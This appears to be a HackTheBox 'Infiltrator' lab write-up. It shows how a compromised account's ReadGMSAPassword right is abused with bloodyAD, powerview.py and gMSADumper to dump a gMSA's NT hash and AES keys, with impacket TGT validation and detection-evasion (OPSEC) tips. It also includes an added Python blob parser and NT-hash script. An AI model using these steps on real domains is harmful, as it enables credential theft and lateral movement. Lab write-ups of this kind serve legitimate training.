ReadGMSAPassword


During domain enumeration with BloodHound, it was identified that the lan_managment account has the ReadGMSAPassword privilege over the infiltrator_svc$ account. Now that the lan_managment account has been compromised, I am able to read the managed password of that gMSA and proceed forward.

NTLM


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=lan_managment@dc01.infiltrator.htb.ccache bloodyAD -v DEBUG -d INFILTRATOR.HTB -k --host dc01.infiltrator.htb get object 'CN=INFILTRATOR_SVC,CN=MANAGED SERVICE ACCOUNTS,DC=INFILTRATOR,DC=HTB'  --attr msDS-ManagedPassword
 
distinguishedName: CN=INFILTRATOR_SVC,CN=MANAGED SERVICE ACCOUNTS,DC=INFILTRATOR,DC=HTB
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:52dfec373c144cb8d50334cb73934612
msDS-ManagedPassword.B64ENCODED: K5cA69XOSgFRll7R/u92u7e1RF123aCLHy77k/q2cDLg060pk3Uvu7e4n7D4BhIpJp6i6QwkpnF8wnfWWhUfWO//6RYQ91KpuABDJQRL5jXROtTJ5ZTD1MU9gVZY8csngpKbXL8r4f9K3L9bgljAyAX+Gd1lY3zwoHLtiE57CgbOFuvU8ELqC5yC+PyvxYmUuDiXBcWqKBvGs0b6NRKlMCxIkEj1gOjtVQpbYFqVEfF0KIpoV3qQyb8tQbLVDzx76L8qfiKQBDUsklKdOGkBFtj7oEaz/jJMOHx5ELgmra08AiaZcrD+DJpAxObKhJiGUtG7JQA16SD1kja0JX8VqQ==

This was done with bloodyAD, which fetches the msDS-ManagedPassword attribute, decodes the MSDS-MANAGEDPASSWORD_BLOB structure, prints the current password base64-encoded and derives its NT hash (the msDS-ManagedPassword.NTLM line; the aad3b435b51404eeaad3b435b51404ee prefix is just the empty LM hash).

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=lan_managment@dc01.infiltrator.htb.ccache powerview INFILTRATOR.HTB/@dc01.infiltrator.htb -k --no-pass --dc-ip $IP -ns $IP -q 'Get-DomainObject "CN=INFILTRATOR_SVC,CN=MANAGED SERVICE ACCOUNTS,DC=INFILTRATOR,DC=HTB" -ResolveGUIDs -Properties msDS-ManagedPassword'         
Logging directory is set to /home/kali/.powerview/logs/dc01.infiltrator.htb
msDS-ManagedPassword     : 52dfec373c144cb8d50334cb73934612

The same attribute can also be queried with PowerView (powerview.py here), which prints the NT hash directly.

Validation (NTLM)


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT 'INFILTRATOR.HTB/infiltrator_svc$@dc01.infiltrator.htb' -dc-ip $IP -hashes :52dfec373c144cb8d50334cb73934612
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Saving ticket in infiltrator_svc$@dc01.infiltrator.htb.ccache

The KDC issued a TGT, which confirms that the NT hash is valid for the group managed service account infiltrator_svc$.

Kerberos Secrets


It is also possible to derive the Kerberos secrets (AES128 and AES256 keys) from the same managed password, which is preferable for OPSEC: authenticating with the NT hash forces RC4 (etype 23) in the AS-REQ, which stands out in Kerberos logs on a domain where AES is the norm. Three well-known tools can do this: DSInternals, GMSAPasswordReader and gMSADumper.

Both DSInternals and GMSAPasswordReader have to run on a Windows host in a session as the user that holds the read right, whereas gMSADumper can be run remotely from Linux over LDAP.

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=lan_managment@dc01.infiltrator.htb.ccache python3 ~/Tools/gMSADumper/gMSADumper.py -d INFILTRATOR.HTB -l $IP -k
Users or groups who can read password for infiltrator_svc$:
 > lan_managment
infiltrator_svc$:::52dfec373c144cb8d50334cb73934612
infiltrator_svc$:aes256-cts-hmac-sha1-96:ff9abf4c80c0c6a64b72a566169a2c17d28b37d72534f97b964449d76628e11b
infiltrator_svc$:aes128-cts-hmac-sha1-96:bcc830aa58603a0079878facd347e2af

gMSADumper prints the NT hash together with the AES256 and AES128 Kerberos keys. The AES keys are derived from the same password with the computer-account style salt (realm in upper case + "host" + the account name without the trailing "$" in lower case + "." + the realm in lower case).
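Added example, not part of the original writeup and not code from bloodyAD, PowerView or gMSADumper: a small Python script that reproduces offline what the tools in the two sections above do with the managed password. It parses a raw msDS-ManagedPassword value (the MSDS-MANAGEDPASSWORD_BLOB structure), computes the NT hash with a pure-Python MD4 (hashlib's md4 is often disabled under OpenSSL 3 without the legacy provider), recomputes the NT hash from the B64ENCODED password that bloodyAD printed above so it can be compared with the 52dfec... value, and builds the salt that gMSADumper and impacket use for the AES keys. The AES keys themselves need impacket's string_to_key (PBKDF2 plus AES-CBC, outside the standard library), so the block stops at the salt. The base64 password and the NT hash constants are copied from the output above; the blob built by build_managed_password_blob is a constructed sample.

```python
import base64
import struct

# Copied from the bloodyAD output above (values from the box, not constructed).
PAGE_B64_PASSWORD = (
    "K5cA69XOSgFRll7R/u92u7e1RF123aCLHy77k/q2cDLg060pk3Uvu7e4n7D4BhIpJp6i6QwkpnF8wnfW"
    "WhUfWO//6RYQ91KpuABDJQRL5jXROtTJ5ZTD1MU9gVZY8csngpKbXL8r4f9K3L9bgljAyAX+Gd1lY3zw"
    "oHLtiE57CgbOFuvU8ELqC5yC+PyvxYmUuDiXBcWqKBvGs0b6NRKlMCxIkEj1gOjtVQpbYFqVEfF0KIpoV"
    "3qQyb8tQbLVDzx76L8qfiKQBDUsklKdOGkBFtj7oEaz/jJMOHx5ELgmra08AiaZcrD+DJpAxObKhJiGU"
    "tG7JQA16SD1kja0JX8VqQ=="
)
PAGE_NT_HASH = "52dfec373c144cb8d50334cb73934612"

MASK32 = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Rotating (a, b, c, d) after every step reproduces the ABCD/DABC/CDAB/BCDA
        # operand order of the specification without spelling out 48 steps.
        for i in range(16):
            a = _lrot((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _lrot((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _lrot((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash: MD4 over the UTF-16LE password bytes, without the null terminator."""
    return md4(password_utf16le).hex()


def parse_managed_password_blob(blob: bytes) -> dict:
    """Parse a raw msDS-ManagedPassword value (MSDS-MANAGEDPASSWORD_BLOB, version 1)."""
    version, _res, length, cur_off, prev_off, query_off, unch_off = struct.unpack_from("<HHIHHHH", blob)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 managed password blob")

    def wstr(start, end):
        s = blob[start:end]
        while s.endswith(b"\x00\x00"):  # drop the null terminator and any alignment padding
            s = s[:-2]
        return s

    ticks_per_day = 86400 * 10**7  # intervals are stored in 100-ns units
    return {
        "current": wstr(cur_off, prev_off or query_off),
        "previous": wstr(prev_off, query_off) if prev_off else b"",
        "query_interval_days": struct.unpack_from("<Q", blob, query_off)[0] / ticks_per_day,
        "unchanged_interval_days": struct.unpack_from("<Q", blob, unch_off)[0] / ticks_per_day,
    }


def build_managed_password_blob(current: bytes, previous: bytes = b"", days: int = 30) -> bytes:
    """Inverse of the parser; used only to construct sample input offline."""
    body = current + b"\x00\x00"
    prev_off = 0
    if previous:
        prev_off = 16 + len(body)
        body += previous + b"\x00\x00"
    body += b"\x00" * (-(16 + len(body)) % 8)  # the two intervals are 8-byte aligned
    query_off = 16 + len(body)
    header = struct.pack("<HHIHHHH", 1, 0, query_off + 16, 16, prev_off, query_off, query_off + 8)
    ticks = days * 86400 * 10**7
    return header + body + struct.pack("<QQ", ticks, ticks)


def gmsa_aes_salt(realm: str, sam_account_name: str) -> str:
    """Kerberos string-to-key salt for computer and gMSA accounts, as used by
    gMSADumper/impacket: REALM + "host" + name without '$' + "." + realm (lower)."""
    return f"{realm.upper()}host{sam_account_name.rstrip('$').lower()}.{realm.lower()}"


def recompute_page_nt_hash() -> str:
    """NT hash recomputed from the B64ENCODED password bloodyAD printed above."""
    return nt_hash(base64.b64decode(PAGE_B64_PASSWORD))


if __name__ == "__main__":
    h = recompute_page_nt_hash()
    print("recomputed NT hash:", h, "== page value" if h == PAGE_NT_HASH else "!= page value")
    sample = build_managed_password_blob("Secr3t!".encode("utf-16-le"), "Old".encode("utf-16-le"))
    print("parsed constructed blob:", parse_managed_password_blob(sample))
    print("AES salt:", gmsa_aes_salt("INFILTRATOR.HTB", "infiltrator_svc$"))
```

To get the AES keys from the parsed password, feed current.decode("utf-16-le", "replace").encode() and the salt from gmsa_aes_salt into impacket's string_to_key for etype 18 (AES256) and 17 (AES128); that is exactly what gMSADumper does, which is why its keys line up with the NT hash from bloodyAD.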

Validation (Kerberos)


┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT 'INFILTRATOR.HTB/infiltrator_svc$@dc01.infiltrator.htb' -dc-ip $IP -aesKey ff9abf4c80c0c6a64b72a566169a2c17d28b37d72534f97b964449d76628e11b
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Saving ticket in infiltrator_svc$@dc01.infiltrator.htb.ccache

A TGT was issued with the AES256 key as well, so both the NT hash and the Kerberos keys of the group managed service account infiltrator_svc$ are valid.